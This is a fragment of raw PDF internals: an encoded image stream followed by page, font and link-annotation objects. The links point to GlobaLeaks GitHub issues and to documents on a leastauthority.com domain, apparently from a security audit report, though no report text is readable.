XAOG-,7#sq+MC+ZuZ,B#S^(TgEHgOunQG:H&0MP@3.F8D>Rjs>qSAAV]X5HLNj7O
"qHQOp`M;Lch9,*EVR"Lmbq_V$T$2=Zoe]$o?:CQRe)Vs?RbrT(fuRu&;QjT5D^!$<>fL-qajBofuGTCArGJHcmF1Wc8lQ9k(\:)?r.-Bj;o3*O#cA>(;,Z>GFPVf(UOYfl#CbI1L,koY:MJSPfsUi:G\;(>pdTsH;\&Do'1>,l);#VX@Y[A^f/[p=*XSE2=Mm\7+[.]BPD\G?5aCF\'si2A$:>GNH/kM\C)kr,at`>MI.W&pOZV3r:t`o#euY[#Yb_`uK52#mUV!$!,FP>Y-/qhij$5Q<.B6#nb*Ia9-nQfun8Q`sV`U%T0jVPp/%1SQemV%tF+jeu!!!!@#dB%Ni^K*$G))b?c`]@mC9bF";RcEl<5d'D6qdBKS7;hia"$e2H%qeGG&\C@TcqLKk8beEprc@c!IO*daOb*"@MGk$Ip?]k4Ymi:3/_hE(=:YYs=nI:6*?Fd[1t\8.p5Y=I7qC$c*9lkM?u*VfED10h>eD$R^H9leftksuMj\!jn*1^E7qE`Jf%jT'p#[\>;Rm'MFOa1%i&b@L+)NWgVdhi6bfm:=Y7S6`ir!'KXUWs"%5U'NB$`rIEsb+_a2%?;)qrGgW;CGg+;qS9?O-p!WW5q&:cVX'"*mhF$;<"p=oG5s$!P#8Le*0h$inI1U_L+)S&:"S7XFQ'kt8X/^XVY(\[:+3_=Z896Y!*UQ\%]/KUCZA,Q/@KkYJ>,=&fBE];(gWLjWlbLSJWqoRA!s(#Z8PfP)-W[^-+WA=PS!%Vkq;_=UX'm-_6B4bot3bT*O!6'q]j/iQt`\pj(-$YkaK1s$ASV8/8EaaRE`/rSh5KYuA7$*,UT-Xa\Br\T%8rc6=&>bli*"rmS?[6&3>]UOaHIk:&Vmu,L\,ridupe\!`ju0.j1+&FY([MY_.'Ja=/+4d;/tLLaY.b[H]UZ+RF"ie75!PtR(QGEqJRN.e$UqCWR4<'k51UUhLD7g"ctdOU2NMosZGFCBT'd!^d=C;A2Z)VMPeQrCIB7+c'jN"JM\!!&r3Y_GLHmGVFhRKC@(`hfDWFcM#h)`+)X%M=qak3/.dB6;X'h3HNCe@i\;>MU3)kNZrS?'ag5Qg"E=,Qd:[*1k-q"YfF*SbC'm*VWZGj/b8QL&I'n_3(*l"2H36$72Q=2!2+)B)@dAO>q51Z=4lFL=$XDpOqQ5(-^YQi^Ih2!T=GTWa#8b.3>'a5]=MGja_Mo/6p8R(d!6E5Wt6heeXPKG1-<6MJn^KN&Zon&&#Xs#F$Ps_9LeYnPj#X"]`"9'j7)(7-$4;[h=^@;q`$=cbJS2j%q@3![3iFQU$Jb`\AgELjXpN5J1:Y:3$_DXLY,9]8/Jnb6H;*_r]WbZMDOd7#:VBVKWV*u,lA9]AZIa=31Ef1F!Z^M9<5hSkO!Ln1=jU1pa#J%[/)jP7B*H$*9:r'_K;C`@J;CU"5K&qFX/5Iul6D#^6MUF0r;bd$Cr$':;ik3M!a``!K$RK(EkU=m!Ms(n'K:r=t19*d+_FKIX'>/GKP$//VY$B"A0[fT=?GE.g:dSeBo<(UXDssrP:.-@neSmFs#sp!,/'KelqFr@[\:+BX'Zi$4e5T;L<1i=4m^h-,9,*Dfk]R?E8lS7XrqhNHuU$T*ffqPRN/behLUqP&m8FI[_W+PI/&!'lg#24XA4?L2^5YpY>thV/d&\JqEO,d$Ldlh?mND$9n>!2(UAL=9J..8Fn=m<\`-OE_=!*9KpPk3m]kWjSr/!!!"`#M*kJ+';1A1ecM-Hn'XD]c!J2'EA+5!&PLrL'%DU!!#9r"P.MlzBP0$n(,3S;"n6I2z:jlkH];Ob_Xe1pf1`"X<1)ul.q=XGl1P)nJ9k%^>eG&\H#PNU=DM"g_S1^r7apHC0C('@b+HISm65L\(@nZYtVDk"J.P$VkT^-*G_k.T(jd(N3f!)ss-E(JJN?I&AbGh?s#DuTX@=sU(pRNiLSI8+joRXbTT'!o%Z*$'Tf1dM5U;0VG'1#HiNftjG5Y]p)SGu4rocg!
LFuam2G_Bgo8*k(hL$s7UP?i&h[T-ul=\#tZLpoYIWG*+IMn?[&gA"pCMQt#Ai=m>$7S8detqV<%lVhcA9%Eg%O9bi$h+9r?7u2gQt`cb`\n;WpW#(h2*r7YfgIn@gQH6-ZXW'V)e>V<_:HtV(d73Y.uJM6[tc`jgHGu$5&rniD'$a5Z4HpL#)$hq<90XIp,47&2UA[idfDb.i8C6"e?p[5Zbs<"(R=Z^S%JEOd++B1pl2Z^d8iuF3"nK=o5G7n"Aq8VVP"oa_Qk#]G!GnW?ZZ)sI((QhUW&'='-d"ioS7:Sho!)/>>:)V>l=Sd%\8S>Cn=drr\!&)nf:?f]:Z_#cT(DI*h.HI[gkQ6TSE[H>e]XdCi=1/Ao!J:5ie(mGlaR4!$2W,RAO.O0.Q0pZd6kH1ia#9oggJH5.VIcgdmY(!D!*+'@+VRW>%oSMR%EOl"g!\(EQ"EP':E<;9p\X":qNOP1"!BX2\?SFH(.=&e^G6j\N>UNIN&sQt4'@YWo4^]LF*H]U'2@FAdTN!T/!0L`d)+>*^:AUoDq..ldrPNR1./(r!%U9-W*+[-*g,kk)/qOgqF4J(66rdJde]d(+2#rMcb\ph42AV,1Fd:k4$e'AYqpLG)DK>V$JQTA)Jcc*OfsXPYo%]ht)s\U#>P*pBV_D^]6#U4o(CEB6Xu+P)7l:38dt%E(5r@a%',?g"$2P_?'9WQ1@WGr;dsn&!C"oGG"R[H_)7.oL@IiCi[HlqtXQ08qb;qiQ--VBj/f\&4f5\rYP]Vtl_t%S:p*?_I])h7'cn[(IXqC$_kW#[q9R@2PSb.D3Te6]?7N,>tmm]70O[5hIm#<\X%Hj>F^d.T*F+;Td;S%D2BsEmT2MZQc1\FD)YPb2oW[3c3>Jg(2dU#PlP5?\oskY`&N^Dec#)hmU7'&rsVihW/j)KkIoYW5G7nT(km5irML%hc,5H\[aK#3QDHPkoPj)Y-10+3m1Z'+4j_"(E99g91o0J[kOK6YSJCD^;+51LLi#JF$NSm/i8Kb_HT9X]]g.6(?"FpkKjnNA$<\?9KsaB`UGRqnBIV>l#V'm?B9!j?XJ76%U^0tB\VrMLHkFI-"h%hY[1/2K;C-+8hNp/6X[G/g&1u\UMCS_E:3>ko)i/K9r9ki)O+"9molg0F%o5#&F;WbU[FALSDm@0lR!oXtF8jhaddSe<@,g-QV#NSP9jR/$_:aW$`$iR79St%&$!f.`BVU*56NV\&Wc!9!0W,Wsk;6(G]#taFbMB?7;sJ"ujgn$ANC".G3?+2u@>9Ka_6ArZXWSB69nhe5SFfMLFeM>f9U=KTeP\/srQ"rqo=tK>%akN!$+7H!]J@%t9bLKd?M4d,JPbrde/^aH/4n9@bBs`Y]?@9tM.]uMD&:@":$V-_;/Y).L8I)Jk+Jc_5!##c%B2=uF*WV=cDlh44K:Ah-*^2.EWJEE"[!b;[Gm?Pr="J-farW\Va`5>.a*k`&"#HH@p*XARFutO&Ku`WYuI5>#T7'f-U(a*;M?21VPg]tee@u5;*ffG2W)e90W(X9,-dqA,cN6)mdI5gBY>8;+f&uodZ0fcM5KC2sot#dr1*=F/m^(8/pfSre692K2h-F;'d7mik-b[eW.8KIjdcl4gYkg4t80H4>V\eK0R=BW>jTu^q3;MRck#tH!!C.S-4-A0:g0J^*X55*%!LVbGU:XUok:)MPPRu::kGjq)g@8H1gmLe^FlsOJKA[)]Hm9T\MM#-@NNR1./2UQaq>*:XA7WI^%a.==)R.6KU(2aY\1Oui*QO>#_d)48f7[(_JYj+mZ[lBpq$nq7VS"o^Nms0*?7f3'dTnfD5%$!!!#Q"IK;<-ijh`z!7ck8[t"d02uipY!!'A4A3L)/i%>`EzD$B&c"*cd*zZk^Bo!<<*"!20;\+a>ujs""?U!WiE)!n'9n6h#%uc[Q&t!!!"lFWgMh^>=3[mG,EgpJ.,ag].3=#9F?TzD%<;dOI?mHkI5Z[4+)I)91t.KQ5"q+!rr<$!
'o:jj>3SXhq[DXLUf?mIX]hteQ%mQp]ZY%J]rVNWF?ccNT:a$*3JMeDQ+bUCn#ZWu4DTH?Rs*g@4+n+Kj^5'&Hf5&VM%NIG.CH*mqY_E6'KFgHU@9X%XOa/o'_`mrS6gg\76%@!lFUoiW.F-7X06fJF6!t-,63n`f&4.*BM&S44GrQo?mb-aRE%jjV^:DS9Dr89Wi8M&A^`!]9&4-XGKP`$RV9d2qjP?;a2WE\+]Q%rn:S!+#E*?4K%0o3*+bUCn'b?-?1)W=MX1%n4.[g4(HE4E_5i-O8$:,L9XPlDM+bUCnfN(=mdY9k(3m/D<#AJ"<63n`f&4-YrWeJA#["*o66>BCu(r-\L#U+j46AQ*dM@+Yh=C-_+Z^c;e&;EoZ$:>Ur#U+j463u\jN5k`$Pd9bkHT7BI+K[/o0Rt="&4-XGKTIs*lpWKnANUqD&.fBa&.jqhQ<*a!?3?'M32drB+<^&I>'n\7AJEGcX_hGr_u,t%$6DsCT1u=:kaRMR+Vdg4sr_n8M?0^r$0R!Vt+'6bY1'LXYnh+XRC(8!SeeB`F.p%hJl>S]U1.pppGH:=IsQQl%q*<>HG=9lD*b&(H8t022m-MK#etZlQg"`:#J8]oYr?*u\%3G"bXFGK[$;2u:C?mijMnI,?:R%jp,W.RCrD2GbPj;=RYSr'KGtUU=,Al2Z)HnCVn'D.s$%X#Il4Blu3s(eWOd'kpn'[O5eG3A'4Tah>H4-r0>[EFn6ile?f927ONMYgr&1-d=j<@t)Vt%;V#soO#A\D;Mp4DoH!.`X6TOc2W4;\da.[3#R5mF)b@2l7LBTp)tb`5nE-VfX[a9JqTqhM959Z.CYIY$W>CcM&ssmW%5@+P*/]U"A/-m"EF5@\Ud$o>.s%^"E.]p-HrpXiN-1gVH(bB&#[s3af"Z.@>KNB+_fd6'=)CcjIYlf!jC#t^QA+Ucg@=#KTc)lmPas45C<)4s5QV^Ia#^'uF(0:]Af@oLb-e%<;:@SY4'9l:n.:s\4&cn`i"LR;0I4e-R0K1a?I+coPe^'N4k^KOd;,mP`fu?o\@o.O,ono7T-O;KR*=lRicnS_X4//>L@*`p2Cnuhm0'tJ"i(fl@?j$UMkqn(_NO1'I/e@-joo=7!GE4h'S9&3*Mn&G,Il!#oV]B:"O5e9poES'[j+$3-OruA3k+]VOgZ6[tA[-+(_b%KY4ob7:*nrS_5)biSY2GBtgH7V7/=;@+2]g_^KU`SHft.K1Ejg;*A'(sn.bc`&gP;.u"[/B^k>.G0^Pn,c&qBB@DZN!:#7_)5gd1ROG+W"4o-'%frr#S]GR"GDaEmd2s25M4&q.4bFTM0ano5K>:)VVU:Qr]UCA&W&r_-QjlHNgB4L:EnqXeKYQd'gRi1%"(p3FtK#'MrgEELqL(?9!Z:SM"[&4HGq@lZ^4NM!O0UAf]rQ1f1R8:'9\[;MK(h4'akHYmt6kI,QOVChff4-c7>T.B3NTq*6ogt&Xa[)MY3furpnPN+89n_(VgbNuZTL\JMb_2ZrKB@j9[9M$QFQPAi$DWB![B))6BGW;fXNUh&X;ZJsn.NpAuc%=Qs>1+rCcCO`pbdbjlpFeX(R%8G6m(ZDPnKEN?&hh\0%pm])@cX/'Z,FIDG=@V.ZJ^$&rHFuqYmsE$9qg5l1$?_$[W2&o*.7I=YFjFW$YO[1mFo6dkCng;qu6:PHS0!Tf$3e&cG>Z$Z"4EJr4-I<%NKVO@AiP"=8CdpDdD#pmEj\o=rQZGSn3r`s)kMpW?&n"CSTU=QrjMTS=ksBY:@]4Y$AtoS(!F"L#m4Lj4q[C&*K#FIBMXXm_:u-c6<&eL\Er\P'&V>&4q_l(2)H+lGpaND*IXFmiNVnP8YOSjd1F.6ennus6J@sCVOq8R`N1;%!oKm)qPT"g;.BsYCBqX@bf5TUV@6sqfnt[V:n9MXN/*'E,khARgJbYgI=;qNO%riX%,*co8SR;R[SUKj[T"O?h[jH0&a@lD;$!O'q(@-G:P/]HdfQ9iDCk
SS%!ZK\oK)CnO@iaoh59G[s/-d#D758T@N/bFdVim-]"SN24X]=hZ]A>^_>",rtbq6!P!MY:Qul-A,r9Lh-,^SedddAbVu_[VcR8(US+qDbtC\E6+Gs%dlE.+_9oI/\fcH2p>JQCtj1DI>;)u:T#IE%mB2A5[S$\p0_%QQNk+%CNa$F]p>)uFlCuu)5FbnCs8c`%l(eG1XpQH*$pSJqPrD3@7,?s1Ua?1H'pi!Fn6b1ZH,^'.S5[SHe?-ck?4+*"bU>o)EBcT&&LOK-WIpH.Nrc:%JM;!J:_.C&eh(Qh46f[k,I`INLf2ch,TaTMm]M@0"#b?>>`aOm.06o_F8Q!/0HR?Cn)cPc!%CE_o^7-KMg;A2[QYQ,p[uY9roN6V%c-"Skp.5[6>JD3)'l`P$*gIFfBS61*ZGHf_Em8IW53_NrTA7$:4J@S.#^A>20$:4gZu2q$Tn3i=bHI->V8Zdj!@0.c.9J`.=E^TtrOmYIUIqa2eap[8`_PI#?)p:rI3p[7Xmr1#RZJ\1[C5eAu!>NR:HrljEqhW+9Z+14chbI7)rlDNVi*e.YOR#Pr)@U^)EE))r1W339a',9YQ@dWpeop3SMH9MH:H`P32/3)j&g-R'g*dcT*EUkrf)hFaAKu$VC0LYA)DEuq%(4*1!!nJ];6%goPfVrXnRd$2h3j!Xi8*u8&fTr&`0UF3A>7)2W.HEn_ENE_[d).jUGjNt]nu#9i+(a8h8j#'0:q'dbR!Lk9FZ1r<)pq@2AlP=kWO*_q\_Y!"bZa:66Mi)Oj39W@9EM[@4*ghr*GqltO\W_42K=p?qN9)\OFnG895_!#sHDR"l>"+J#+8phk>lY!89N2W:^1AphiVkBe^qbbh`X0sM(32utCe?qs@*eNKXJn!frFar@[B[!g.Ong(I:+_>+JM*"WNIWZk#]cMK3JlkW';rV,5a\M5*-AQ'c&I>$@0^E7+nRpYr9S$TEl6h(,)A&f:S!q)7>1re#pQQ[]@#\(us0Xj.+KnZg'3s3\gF_Zk*LTY%M:\qb>Wmcs]R^NjX7jT?`BuKjgUk0GI@$md=6H.%ZcQ>9o=q@I*?k&2j6N[ZD]J^]`7ldSm)N+f7JFblD.-jJJ%_s$i]rj6[q(EjSH+bI%H&8f"F$%@rL655IGFiPi6e]Z7`6CD`2,Nl(I2N;q[(K.*"?3D2,aWF:Y:P$G/7a]hgZ#P9TtWYM0\3nPXDeNO6Xi0irsfphmujadt=a:VJ!!deIJmq+9WFS(8Sg^2Q0u7UjT\^HL-]$b@4_CW"^D4&:OOgH`6M:r't_F]!#c#-eUCN9eE4#apc[98W):oGI^#`Z*8u3>,$t2,Oimh@9$U;Xup?2n\+Hm07Lk[S*JdS0=-+Tj5I'RQ0u`+d1r>u4Y_=NGJ+%7cOC.@Q^enZ'RM:Ef58YanpdAG@\@@K%=#%=%Z3`a(e.DO]P")`M8)DabZ&1elG%9hi#p._u8B^ilu8=;7&$93,5"ik*NpUu[-bRYbB2R-=%h=e#sB4+BD9rmc\2^]*4frUl#,+\SB&DeAUiZsdQ?+Y+"[X_bcIu@YqmBpf[=tG7%et].h'+7E.MH]JW55*gG$1MofLFBWdK:Xk2OhBk_;JSA$++(dLn4:RJYg\SP=?6FU]r$NsC[BMsA!!FB8UV.nf2S31ek_DqO7hE8oMN:\PO#!^*p&03I^ZCfG(AjCN.;o9N+M**>5'B;Z5UFgaT6DR3Bp009=*FrfgTa61t6mJGSHI@'9u.#"!h-/+-A=9UjX6V$i7J+7@T6,,L*dkSCX.:fp>p.Lau2r$PDgVomUfd=)\SG4C-rYAl^&H.G`,AX(*oBGI6^t8&5rT^nnU3&a>joRV)Y[\RmIQD=B*>DZi=,,o\G5o5BSm8S\2c,i&p%su+8kUjF&&$o:W^<=Ka#5$m`gZK5rgA=,fP[qL%D-PCT7`t12lf#or9I*k+2+mPAe[84[%`uZ(8M9@nr&ra/7bVrc77.?u0qULD(7<13`0Q9q+(LSr]5
aY2^l3I\-(>>]a(GI'YscfdcAV9WWgec@J@[Sik9kh!$!R@*JDb)B=9c%b/4qMGpJGD-Ds4nO@7nI'Pjg\;Q?S!f)n'g%iT*Y9.hYfZQl-d4+T1R58(-_XV/`ml9g3m0:PEs_B'2^PXo?R/`)j+q9>3WKp0?hPkYgI==0@Pt(4)cARC#1j74uVD0aJi1?S>X]'k3TD7d!hVF;o^N*nR6=S?G.+o&T_tfT/bis]_L[i9O"`?mbn73(XAV2\oJiSS>J5/AR_acp[.^#nhb^8dR>o5-Ksg\YjfiS24Ue?mO&)=A?f7B7p-@Gm+R2*D"YedQ/6n,*f^R7GW6e0JBRJ6L_=c46>N*Y,sU;O3n4*Cd/c'=g]Sb$b-@PF\iF(6o=j]p/P/B"tO+&D%TV'a4=\/$,'G4*eh5V*ZaC]iG2g.+$V5DJPm9WVtM:2lm+hgbP"qK^?^AVSEa8P2af*YW\`H6b,ps1c7Z=`#>i_Z8IRE9YrCE9S[Y&om#"Do53Z7:!LRNIn`>-q-h!KF4t`<'n8=58k@CIkYK3Sho8L?62_nS/Ka2@F!V!@$X=QbKZe:m,=`:O.SOj%?"#2Oe\o7'Rq$;Bj)6_>0f*j*R8@r=(:-KP&p-\c%ie&Ad$B6We#^3T%a?cB5d*1OHmdi]*4EqXhRNN3"/7I5CsMrjiZaYHogW%l=_#Kt$`j_R/qM'"r&cV@R5=O!n[3jIY65C@qVK556^r&"6(]\6jtZSWXmVWDqd_\kX&rP9CIc*fX$0q`O*%hgXkQIc9LBDDDs#AZ:VF,^67:!;jSL,44+qLa\bSDnI.<)1=3RaUuBi0+HLkGRpYFMfR,#0.u'5N)V?2oSS'`L3>Ao@#/FDu]l-Vr7UUq.M_f5X$(r!0E7r!s%DWi;`lRBK,uW4rOn2OH5+u!9Bp6!!)h":r=`2h[0@VEMGI_4V88\kJ(<)+;/1rB!s$h9_Z9c.)85"1a7u%l=Si+!RPeP+&J5Tead4)8b?(&~>endstream endobj % 'FormXob.109b1ed966e89c0d2b712244fe23e81a': class PDFImageXObject 160 0 obj << /BitsPerComponent 8 /ColorSpace /DeviceGray /Decode [ 0 1 ] /Filter [ /ASCII85Decode /FlateDecode ] /Height 525 /Length 132 /Subtype /Image /Type /XObject /Width 758 >> stream Gb"0;0`_7S!5bE.WFlSlTE"rlzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz!!(qoBJ7@a~>endstream endobj % 'Annot.NUMBER138': class PDFDictionary 161 0 obj << /A << /S /URI /Type /Action /URI (https://docs.google.com/a/leastauthority.com/document/d/1SMSiAry7x5XY9nY8GAejJD75NWg7bp7M1PwXSiwy62U/pub) >> /Border [ 0 0 0 ] /Rect [ 139.3314 357.7736 375.9585 369.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER139': class PDFDictionary 162 0 obj << /A << /S /URI /Type /Action /URI (https://github.com/globaleaks/GlobaLeaks/issues/782) >> /Border [ 0 0 0 ] /Rect [ 452.1188 264.7736 531.5988 276.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER140': class 
PDFDictionary 163 0 obj << /A << /S /URI /Type /Action /URI (https://github.com/globaleaks/GlobaLeaks/issues/782) >> /Border [ 0 0 0 ] /Rect [ 85.69291 252.7736 102.3729 264.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER141': class PDFDictionary 164 0 obj << /A << /S /URI /Type /Action /URI (https://docs.google.com/document/d/1P-uHM5K3Hhe_KD6YvARbRTuqjVOVj0VkI7qPO9aWFQw/edit?usp=sharing) >> /Border [ 0 0 0 ] /Rect [ 171.2929 252.7736 389.1429 264.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER142': class PDFDictionary 165 0 obj << /A << /S /URI /Type /Action /URI (https://github.com/globaleaks/GlobaLeaks/issues/782) >> /Border [ 0 0 0 ] /Rect [ 85.69291 222.7736 192.1256 234.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER143': class PDFDictionary 166 0 obj << /A << /S /URI /Type /Action /URI (https://docs.google.com/document/d/1P-uHM5K3Hhe_KD6YvARbRTuqjVOVj0VkI7qPO9aWFQw/edit?usp=sharing) >> /Border [ 0 0 0 ] /Rect [ 210.9265 222.7736 439.4109 234.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER144': class PDFDictionary 167 0 obj << /A << /S /URI /Type /Action /URI (https://github.com/globaleaks/GlobaLeaks/issues/822) >> /Border [ 0 0 0 ] /Rect [ 189.6129 192.7736 324.1229 204.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page12': class PDFPage 168 0 obj % Page dictionary << /Annots [ 161 0 R 162 0 R 163 0 R 164 0 R 165 0 R 166 0 R 167 0 R ] /Contents 354 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] /XObject << /FormXob.50a88798ae89ee7ab040ed56b8555632 159 0 R >> >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER145': class LinkAnnotation 169 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 278 0 R /XYZ 62.69291 768.5236 0 ] /Rect [ 62.69291 396.7736 387.6228 408.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page13': class PDFPage 170 0 obj % Page dictionary << /Annots [ 169 0 R ] /Contents 355 0 R /MediaBox [ 0 0 
595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER146': class PDFDictionary 171 0 obj << /A << /S /URI /Type /Action /URI (https://github.com/globaleaks/GlobaLeaks/issues/823) >> /Border [ 0 0 0 ] /Rect [ 241.6629 507.7736 376.1729 519.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER147': class PDFDictionary 172 0 obj << /A << /S /URI /Type /Action /URI (https://github.com/globaleaks/GlobaLeaks/issues/823) >> /Border [ 0 0 0 ] /Rect [ 189.6129 456.7736 324.1229 468.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page14': class PDFPage 173 0 obj % Page dictionary << /Annots [ 171 0 R 172 0 R ] /Contents 356 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER148': class PDFDictionary 174 0 obj << /A << /S /URI /Type /Action /URI (https://github.com/globaleaks/GlobaLeaks/issues/672) >> /Border [ 0 0 0 ] /Rect [ 408.8427 186.7736 511.3427 198.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER149': class PDFDictionary 175 0 obj << /A << /S /URI /Type /Action /URI (https://github.com/globaleaks/GlobaLeaks/issues/824) >> /Border [ 0 0 0 ] /Rect [ 189.6129 141.7736 324.1229 153.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page15': class PDFPage 176 0 obj % Page dictionary << /Annots [ 174 0 R 175 0 R ] /Contents 357 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER150': class PDFDictionary 177 0 obj << /A << /S /URI /Type /Action /URI (https://github.com/globaleaks/GlobaLeaks/issues/782) >> /Border [ 0 0 0 ] /Rect [ 310.3728 333.7736 412.6927 345.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER151': class PDFDictionary 178 0 obj << /A 
<< /S /URI /Type /Action /URI (https://docs.google.com/document/d/1P-uHM5K3Hhe_KD6YvARbRTuqjVOVj0VkI7qPO9aWFQw/edit?usp=sharing) >> /Border [ 0 0 0 ] /Rect [ 424.5627 333.7736 532.3827 345.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER152': class PDFDictionary 179 0 obj << /A << /S /URI /Type /Action /URI (https://docs.google.com/document/d/1P-uHM5K3Hhe_KD6YvARbRTuqjVOVj0VkI7qPO9aWFQw/edit?usp=sharing) >> /Border [ 0 0 0 ] /Rect [ 85.69291 321.7736 195.7229 333.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER153': class PDFDictionary 180 0 obj << /A << /S /URI /Type /Action /URI (https://github.com/globaleaks/GlobaLeaks/issues/825) >> /Border [ 0 0 0 ] /Rect [ 189.6129 303.7736 324.1229 315.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page16': class PDFPage 181 0 obj % Page dictionary << /Annots [ 177 0 R 178 0 R 179 0 R 180 0 R ] /Contents 358 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER154': class LinkAnnotation 182 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 239 0 R /XYZ 62.69291 767.5236 0 ] /Rect [ 456.6714 702.7736 531.032 714.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER155': class LinkAnnotation 183 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 239 0 R /XYZ 62.69291 767.5236 0 ] /Rect [ 62.69291 690.7736 198.4057 702.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER156': class LinkAnnotation 184 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 216 0 R /XYZ 62.69291 767.5236 0 ] /Rect [ 397.5106 690.7736 532.2463 702.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER157': class LinkAnnotation 185 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 216 0 R /XYZ 62.69291 767.5236 0 ] /Rect [ 62.69291 678.7736 283.8929 690.7736 ] /Subtype /Link /Type /Annot >> endobj % 'F6': class PDFType1Font 186 0 obj % Font Courier-Bold << /BaseFont /Courier-Bold 
/Encoding /WinAnsiEncoding /Name /F6 /Subtype /Type1 /Type /Font >> endobj % 'F7': class PDFType1Font 187 0 obj % Font Courier-Oblique << /BaseFont /Courier-Oblique /Encoding /WinAnsiEncoding /Name /F7 /Subtype /Type1 /Type /Font >> endobj % 'Page17': class PDFPage 188 0 obj % Page dictionary << /Annots [ 182 0 R 183 0 R 184 0 R 185 0 R ] /Contents 359 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER158': class LinkAnnotation 189 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 216 0 R /XYZ 62.69291 767.5236 0 ] /Rect [ 293.8244 558.5736 530.0404 570.5736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER159': class LinkAnnotation 190 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 216 0 R /XYZ 62.69291 767.5236 0 ] /Rect [ 62.69291 546.5736 206.7156 558.5736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER160': class LinkAnnotation 191 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 239 0 R /XYZ 62.69291 767.5236 0 ] /Rect [ 227.8665 546.5736 446.9509 558.5736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER161': class PDFDictionary 192 0 obj << /A << /S /URI /Type /Action /URI (https://github.com/globaleaks/GlobaLeaks/issues/826) >> /Border [ 0 0 0 ] /Rect [ 189.6129 387.5736 324.1229 399.5736 ] /Subtype /Link /Type /Annot >> endobj % 'Page18': class PDFPage 193 0 obj % Page dictionary << /Annots [ 189 0 R 190 0 R 191 0 R 192 0 R ] /Contents 360 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'F8': class PDFType1Font 194 0 obj % Font Courier-BoldOblique << /BaseFont /Courier-BoldOblique /Encoding /WinAnsiEncoding /Name /F8 /Subtype /Type1 /Type /Font >> endobj % 'Page19': class PDFPage 195 0 obj % Page dictionary << /Contents 361 0 R /MediaBox [ 0 0 595.2756 841.8898 ] 
/Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER162': class PDFDictionary 196 0 obj << /A << /S /URI /Type /Action /URI (http://stackoverflow.com/a/1365186) >> /Border [ 0 0 0 ] /Rect [ 517.0227 537.7736 528.7598 549.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER163': class PDFDictionary 197 0 obj << /A << /S /URI /Type /Action /URI (http://stackoverflow.com/a/1365186) >> /Border [ 0 0 0 ] /Rect [ 62.69291 525.7736 162.1629 537.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER164': class PDFDictionary 198 0 obj << /A << /S /URI /Type /Action /URI (https://github.com/globaleaks/GlobaLeaks/issues/832) >> /Border [ 0 0 0 ] /Rect [ 189.6129 486.7736 324.1229 498.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page20': class PDFPage 199 0 obj % Page dictionary << /Annots [ 196 0 R 197 0 R 198 0 R ] /Contents 362 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R 